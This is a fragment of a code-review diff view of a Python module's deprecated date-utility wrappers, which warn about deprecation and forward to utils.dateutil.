4027 "use 'utils.dateutil.makedate'")
4023 nouideprecwarn(msg, "4.6")
4028 nouideprecwarn(msg, "4.6")
4024 return dateutil.makedate(*args, **kwargs)
4029 return dateutil.makedate(*args, **kwargs)
4025
4030
4026 def datestr(*args, **kwargs):
4031 def datestr(*args, **kwargs):
4027 msg = ("'util.datestr' is deprecated, "
4032 msg = ("'util.datestr' is deprecated, "
4028 "use 'utils.dateutil.datestr'")
4033 "use 'utils.dateutil.datestr'")
4029 nouideprecwarn(msg, "4.6")
4034 nouideprecwarn(msg, "4.6")
4030 debugstacktrace()
4035 debugstacktrace()
4031 return dateutil.datestr(*args, **kwargs)
4036 return dateutil.datestr(*args, **kwargs)
4032
4037
4033 def shortdate(*args, **kwargs):
4038 def shortdate(*args, **kwargs):
4034 msg = ("'util.shortdate' is deprecated, "
4039 msg = ("'util.shortdate' is deprecated, "
4035 "use 'utils.dateutil.shortdate'")
4040 "use 'utils.dateutil.shortdate'")
4036 nouideprecwarn(msg, "4.6")
4041 nouideprecwarn(msg, "4.6")
4037 return dateutil.shortdate(*args, **kwargs)
4042 return dateutil.shortdate(*args, **kwargs)
4038
4043
4039 def parsetimezone(*args, **kwargs):
4044 def parsetimezone(*args, **kwargs):
4040 msg = ("'util.parsetimezone' is deprecated, "
4045 msg = ("'util.parsetimezone' is deprecated, "
4041 "use 'utils.dateutil.parsetimezone'")
4046 "use 'utils.dateutil.parsetimezone'")
4042 nouideprecwarn(msg, "4.6")
4047 nouideprecwarn(msg, "4.6")
4043 return dateutil.parsetimezone(*args, **kwargs)
4048 return dateutil.parsetimezone(*args, **kwargs)
4044
4049
4045 def strdate(*args, **kwargs):
4050 def strdate(*args, **kwargs):
4046 msg = ("'util.strdate' is deprecated, "
4051 msg = ("'util.strdate' is deprecated, "
4047 "use 'utils.dateutil.strdate'")
4052 "use 'utils.dateutil.strdate'")
4048 nouideprecwarn(msg, "4.6")
4053 nouideprecwarn(msg, "4.6")
4049 return dateutil.strdate(*args, **kwargs)
4054 return dateutil.strdate(*args, **kwargs)
4050
4055
4051 def parsedate(*args, **kwargs):
4056 def parsedate(*args, **kwargs):
4052 msg = ("'util.parsedate' is deprecated, "
4057 msg = ("'util.parsedate' is deprecated, "
4053 "use 'utils.dateutil.parsedate'")
4058 "use 'utils.dateutil.parsedate'")
4054 nouideprecwarn(msg, "4.6")
4059 nouideprecwarn(msg, "4.6")
4055 return dateutil.parsedate(*args, **kwargs)
4060 return dateutil.parsedate(*args, **kwargs)
4056
4061
4057 def matchdate(*args, **kwargs):
4062 def matchdate(*args, **kwargs):
4058 msg = ("'util.matchdate' is deprecated, "
4063 msg = ("'util.matchdate' is deprecated, "
4059 "use 'utils.dateutil.matchdate'")
4064 "use 'utils.dateutil.matchdate'")
4060 nouideprecwarn(msg, "4.6")
4065 nouideprecwarn(msg, "4.6")
4061 return dateutil.matchdate(*args, **kwargs)
4066 return dateutil.matchdate(*args, **kwargs)
General Comments 0
You need to be logged in to leave comments. Login now